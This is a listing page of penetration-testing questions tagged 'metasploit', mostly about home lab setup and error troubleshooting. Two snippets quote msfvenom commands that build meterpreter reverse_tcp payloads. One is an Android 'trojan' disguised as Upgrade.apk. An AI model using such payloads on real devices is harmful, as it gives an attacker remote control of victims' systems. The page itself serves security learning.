Skip to main content

Questions tagged [metasploit]

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

0 votes
0 answers
28 views

Getting the ipv4 address of my VM

I just installed metasploit2 on VMware and changed its network to a Bridge Adapter. Now I want to get my Metasploit2 IPv4 but when I run ifconfig it shows only IPv6 for eth0. I need IPv4. What should ...
Cyber Practice's user avatar
0 votes
0 answers
30 views

Kali Linux Postgresql Metasploit DB Fails to Start

I currently have 3 versions of postgres installed, 14, 15, 16. All 3 are actively running and can be accessed from user postgres on ports 5432, 5433, and 5434. When running sudo msfdb status it ...
Aarav's user avatar
  • 1
0 votes
0 answers
40 views

How can I include exploit advanced in msfvenom?

How can I include advanced options with msfvenom This is usually how I create the files msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.52 LPORT=4567 --platform windows -f exe -o file.exe ...
AA AA's user avatar
  • 1
0 votes
1 answer
803 views

VNC Server Password not changing on port 5900

I'm trying to fix the VNC Server 'password' Password vulnerability of Metasploitable 2. I have changed the vncserver password using vncpasswd and it works fine for all the ports but 5900. After ...
donthowtocode's user avatar
0 votes
2 answers
1k views

What are these extra IPs shown when using netdiscover?

I've set up a Metaspolitable2 and a Kali Linux machine in VirtualBox. In network settings, I've set up both as a NAT Network, and I've given the NAT Network a DHCP Range of 172.16.10.0/29. When I do ...
Sadir Omer's user avatar
0 votes
1 answer
2k views

What is the process to get a new modules into metasploit framework (msf6)?

Im interested to know how a new module or exploit gets into Metasploit Framework? I can see the new PrintNightmare vulnerability being worked on/ finished, so I ran an update on Kali, but it didn't ...
Chezzers's user avatar
0 votes
1 answer
1k views

Is metasploit is a virus?

When I opened the metasploit exe from the official website, Windows security spammed me with notifications "Issues found" and when I looked the files marked where Trojans from the actual ...
user avatar
2 votes
1 answer
14k views

What am I getting this Metasploit error: “Exploit aborted due to failure: no-target: No matching target”

Currently running two VMs on a host-only adapter for practice, on one is Kali Linux, and the other is Microsoft Windows XP SP2. I am attempting to access the Windows XP VM through the common windows/...
Ji-Ta-Ku-To's user avatar
0 votes
0 answers
7k views

Exploit completed but no session was created

I was trying a pen-test on my PC by WSL and Kali and everything was fine until the payload was created and executed on my target PC, also getting a session back. After the first step, I get: msf6 >...
Crispy Con's user avatar
1 vote
0 answers
747 views

Metasploit is stuck after sessions is open. Meterpreter doesn't show up

I'm experimenting with Metasploit and using it on my own machine. I'm running Kali Linux on VirtualBox and trying to open a meterpeter session to my host Win 10 OS. I generate a reverse_tcp payload, ...
blablaalb's user avatar
1 vote
1 answer
1k views

Clearing Threats / Actions from Windows Defender for items I have manually deleted?

Background I'm on Windows 10 (Version 10.0.18363 Build 18363). I downloaded but did not install Metasploit (I'm a CSA). I forgot to add an exemption, and Windows Defender naturally unpacked and ...
msanford's user avatar
  • 741
2 votes
2 answers
743 views

Can I install a VM inside a VM?

I am not good at computer. Currently, I'm using Kali Linux as a VM using VMware. I want to install Metasploitable2 using virtual box inside this VM. Can I do that?
Deeleted PK's user avatar
0 votes
1 answer
3k views

Msfvenom No Arch selected, selecting arch: davlik from payload

I was running a command to create an Android trojan. Command was: msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST =192.168.0.104 LPORT=4444 R > /root/Desktop/Upgrade.apk I am ...
Still_Noob's user avatar
1 vote
1 answer
2k views

msfconsole error - "No session was created"

I tried to open a session on msfconsole but it gives me an error: "Exploit was completed, but no session was created."
efe's user avatar
  • 11
0 votes
1 answer
1k views

OpenSSL SSL_read: SSL_ERROR_SYSCALL, errno 10054

I am traying to install metasploiteable when execute this comand "vagrant up win2k8" this error appears OpenSSL SSL_read: SSL_ERROR_SYSCALL, errno 10054
JhosNoel T's user avatar

15 30 50 per page